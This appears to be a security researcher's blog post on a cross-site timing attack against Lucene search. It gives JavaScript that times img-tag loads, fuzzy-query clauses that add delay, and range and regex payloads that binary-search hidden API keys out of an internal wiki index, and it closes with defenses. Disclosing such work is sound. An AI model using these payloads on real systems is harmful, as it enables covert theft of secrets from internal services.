Exploiting CSRF against search with Lucene

Cross domain timing attacks can be used against Lucene to reliably extract information contained within its index. By repeatedly timing HTTP requests using JavaScript Lucene search boxes can be exploited in a similar way to time based blind-sql injection.

While the same-origin policy prevents a script on one domain reading the content of a resource on another it does not stop the script timing how long a resource takes to load or error. Timing for HTTP GET requests can be done with the onerror event of an html img tag (although other tags work as well). The time it takes the resource to error can be worked out by timing the difference between the addition of the image to the DOM and the time that the onerror event is called.

var node = document.createElement("img");
node.src = "http://wiki.corp:8090/search?txt=fred";
node.onerror = function() { console.log(Date.now() - sTime); };
var out = document.getElementsByTagName("body")[0];
var sTime = Date.now();
out.appendChild(node);

By observing the time taken to error the attacker could attempt to work out if the string "Fred" is indexed. The premise is that if "Fred" is present that the server will take a different amount of time to respond when compared to a baseline response.

This would be good if it were that simple, if you try and do this you'll notice that there is basically little to no difference between a query that is present and one that is not. Influencing factors can be a high variance in network latency and server load which can easily mask the results in noise. Looking at the graphs below (20 requests for an item that exists and 20 requests for an item that does not exist) you'll see that it's going to be pretty tricky to distinguish the two result sets apart.

Query exists vs Query does not exist graph

Reducing effects of jitter

Network latency and server load vary over time, the more hops between the location where JavaScript is running and the Lucene instance the higher the variance in network delay. The solution to reduce the noise is to issue two pairs of requests exactly the same time. One for an item you know does not exist (a random string) and the other for an item whose presence you want to check. If the difference between the timings for both items is close to 0 then you can assume that neither item existed - if they differ then you can assume that the item exists.

You can see the effect of this quasi noise-cancellation looking at the graph below. When the requests are made concurrently queries that exist generally take a slightly longer time to respond. Even when there is a spike in network latency at request 11 the distance between both requests remains almost constant.

Concurrent request graph showing noise cancellation

Adding delay to Lucene

Its clear that Lucene is still responding too quickly to make this attack reliable. The gap between positive and negative matches is only a few ms and attempting to time this on anything but a LAN is going to be hard. Much like trying to exploit a blind SQL injection we need to slow down requests when a result is found, this will improve the tolerance to noise. Something similar to this, but in Lucene:

SELECT id, txt FROM customers WHERE txt LIKE "%fred%" AND SLEEP(10)

There are no available sleep commands within the Lucene Syntax but we can exploit some if its features to generate a delay. The fuzzy match (denoted by a ~) is the slowest matching technique as it relies on computing the Levenshtein distance. If the distance is 2 or less the the string matches. This means we can write a pair of search terms as so:

(fred) AND (aaaaaaaaaaaaaaabb~ OR frde~...) // Query exists
(josh) AND (aaaaaaaaaaaaaaabb~ OR johs~...) // Query does not exist

This will match "fred" and then attempt to match the Levenstien fuzzy matches. "frde" is only a score of 2 away from "fred" so this will match. The more fuzzy matches you insert and the longer they are the larger the difference between the two request types. The graph below shows the difference in concurrent response times when a 200 char fuzzy clause is appended, there is now a 40ms delay between request types. Note how the noise cancellation creates a buttery smooth difference line :)

Graph showing difference between queries after the addition of a Fuzzy query

Auto calibration and data classification

You could easily look at the above graph and set a threshold for an item to be present (> 40ms) and another threshold (< 5ms) for an item not to exist. Relying on a pre-defined threshold for classification means the code won't work outside of your test environment. A set of statistical models must be automatically built and tested before you can commence data extraction.

The simplest way to do this is to keep adding fuzzy queries until the difference between true and false queries reaches a pre-determined value. Depending on the amount of data indexed you can easily cause a denial of service against Lucene so its wise to start out with a small fuzzy query and slowly increase its size until you achieve the desired delay. If there is no difference then either the string you are looking for doesn't exist or there is too much network noise.

Assuming there is only one Lucene server distributions for both sets are roughly Gaussian but skewed slightly in each direction. Below are the distributions for 400 concurrent queries (red: false, blue: true)

Histogram showing distributions for True and False

Simple thresholding is by far the easiest method to use although more complex classifiers also work better if the sets are slightly overlapping. Even with noise cancellation its possible for results to get miss classified, this is why it is essential that several requests are made in order for accurate classification.

Binary searching to extract data

You could try and guess words and phrases within the index but its probably more fruitful to target specific strings that may have been indexed by a specific application. For example, if Lucene is powering an internal wiki it would be wise to hunt for AWS secret keys or API keys used for specific services.

Up until now we have just been confirming the presence of a value within the index. In order to extract data we need to be able to search for data in a specific format. Luckily Lucene lets us do that with range requests and regular expressions. The query below would match a 32 digit hex string (e.g. an API key)

(
 ([00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF])
 AND 
 (/[A-F0-9]{32}/)
 AND
 (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~)
)

For our false query we can just set the range to two random 32 char hex strings that differ by a few characters. The problem at this point is that we need to know another string in the document, otherwise our fuzzy match (which is a group of OR statements) will return false. This can be overcome by just guessing a word. A fuzzy search like IN~ will match IN AN ON IM ID IT TIN IS etc.. stick a few together and you'll almost certainly match the document as long as somewhere in it there is a two character word.

A binary search has to be modified slightly as we don't have less than or greater than operators, if the target is "50F86BE4F3F552673EFC68F3511875F6" the search requests will look like this:

[00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[00000000000000000000000000000000 TO 7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[00000000000000000000000000000000 TO 3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[40000000000000000000000000000000 TO 5FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[40000000000000000000000000000000 TO 4FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 57FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 53FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 51FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 507FFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50800000000000000000000000000000 TO 50BFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50C00000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50C00000000000000000000000000000 TO 50DFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50E00000000000000000000000000000 TO 50EFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F00000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F00000000000000000000000000000 TO 50F7FFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F80000000000000000000000000000 TO 50FBFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[...]

Preventing client and server caching

Sometimes results get cached either by the server or the client, we want to prevent this or it'll interfere with our timing. The best way is to add an additional clause to our statements. This must be in the form of a random string that in all certainty wont be present anywhere within the index e.g.

(
 ([00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF])
 AND 
 (/[A-F0-9]{32}/)
 AND
 ((AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~ OR IN~) OR (QPDEK32L))
)

Demo

Here is a quick video of a 32 digit hex string getting remotely extracted using Chrome 46 (timings are not as accurate in Firefox which means increasing the delay further). Initially the demo calibrates itself to determine the optimal length of a fuzzy query. Once this has been identified it proceeds to a do a binary search, the range of the current search is displayed in the top left. The code runs on an unstable network and requires that 4 out of the previous 6 concurrent timing results agree before it will continue to the next binary range. If you look carefully you can see it occasionally request additional data.

The data extraction rate is slow, ~12 HTTP requests for every 1 bit of information. After the initial calibration it takes 80 seconds to extract 128 bits of text - this amounts to a data rate of roughly 1.5 bits per second.

I'll release the binary search code once my beef module is complete, in the mean time there is more than enough information here to write your own tool. This code is all you need to make concurrent requests.

Defending against this

The simplest and most robust solution is to add a CSRF token. If you don't want to do that then you could try filtering HTTP Accept headers, they should read something along the lines of "Accept: image/ webp,/;q=0.8" if the page is being loaded through an img tag. The other possibility is to restrict the user from performing Range, Regexp, Wildcard or Fuzzy searches, although even if you do this you could still be vulnerable.

What next?

These attacks are not new, other search engines which have complex query functionality are also likely vulnerable to timing attacks.